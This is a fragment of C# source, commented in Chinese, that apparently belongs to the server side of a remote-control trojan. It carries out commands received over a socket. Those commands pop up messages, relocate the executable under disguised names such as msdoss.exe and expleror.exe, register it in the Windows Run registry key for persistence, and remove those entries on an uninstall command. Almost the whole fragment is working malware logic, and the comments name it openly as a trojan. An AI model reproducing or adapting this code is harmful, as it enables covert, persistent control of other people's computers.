string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}

//>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>以上是警告>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
//&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&以下是建议&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&
if(ss=="jy0000")
{
MessageBox.Show(mystr);
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);
}
//&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&以上是建议&&&&&&&&&&&&&&&&&&&&&&&&&&&

//##################################以下是修改木马位置###################
//||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
if(ss=="mw1000")
{
try{ File.Move("c:\\winnt\\system\\expleror.exe","c:\\winnt\\system32\\msdoss.exe");}
catch{}

try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",true);
key1.SetValue("msdoss","c:\\winnt\\system32\\msdoss.exe");


key1.Close();


}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
key2.SetValue("msdoss","c:\\winnt\\system32\\msdoss.exe");
key2.Close();


}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);

}
//|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||

//_____________________________________________________________________

if(ss=="mw0100")
{
try{File.Move("c:\\winnt\\system\\expleror.exe","d:\\winnt\\system32\\microsoftt.exe");}
catch{}

try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",true);
key1.SetValue("microsoftt","d:\\winnt\\system32\\microsoftt.exe");


key1.Close();


}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
key2.SetValue("microsoftt","d:\\winnt\\system32\\microsoftt.exe");
key2.Close();


}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);


}
//______________________________________________________________________


//=======================================================================
if(ss=="mw0010")
{
try{File.Move("c:\\winnt\\system32\\msdoss.exe","c:\\winnt\\system\\expleror.exe");}
catch{}

try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",true);
key1.SetValue("expleror","c:\\winnt\\system\\expleror.exe");


key1.Close();


}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
key2.SetValue("expleror","c:\\winnt\\system\\expleror");
key2.Close();


}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);


}


//===================================================================
//*******************************************************************
if(ss=="mw0001")
{
try{File.Move("d:\\winnt\\system32\\microsoftt.exe","c:\\winnt\\system\\expleror.exe");}
catch{}

try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",true);
key1.SetValue("expleror","c:\\winnt\\system\\expleror.exe");


key1.Close();


}
catch{}
if(key1==null)
{
try
{
RegistryKey key2=rrr.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
key2.SetValue("expleror","c:\\winnt\\system\\expleror");
key2.Close();


}//try
catch{}
}//if(key1==null){
string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);




}

//*************************************************************************

//##################################以上是改变位置##########################
//··················以下是卸载木马·················
if(ss=="xz0000")
{


try
{
key1=rrr.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",true);
try{key1.DeleteValue("expleror");}
catch{}
try{key1.DeleteValue("msdoss");}
catch{}
try{key1.DeleteValue("microsoftt");}
catch{}

key1.Close();


}
catch{}


string str="hkz";
byte[] bytee=System.Text.Encoding.ASCII.GetBytes(str.ToCharArray());
socket.Send(bytee,bytee.Length,0);


}


//··················以上是卸载木马·················


}//socket



//
// TODO: Add any constructor code after InitializeComponent call
//
}//targett


/// <summary>
/// 清理所有正在使用的资源。
/// </summary>
protected override void Dispose( bool disposing )
{
if( disposing )
{
if (components != null)
{
components.Dispose();
}
}
base.Dispose( disposing );
}

#region Windows Form Designer generated code
/// <summary>
/// 设计器支持所需的方法 - 不要使用代码编辑器修改
/// 此方法的内容。
/// </summary>
private void InitializeComponent()
{
//
// Form1
//
this.AutoScaleBaseSize = new System.Drawing.Size(6, 14);
this.ClientSize = new System.Drawing.Size(292, 266);
this.Name = "Form1";
this.Text = "Form1";
this.Load += new System.EventHandler(this.Form1_Load);

}
#endregion

/// <summary>
/// 应用程序的主入口点。
/// </summary>
[STAThread]
static void Main()
{
Application.Run(new Form1());
}

private void Form1_Load(object sender, System.EventArgs e)
{

}
}
}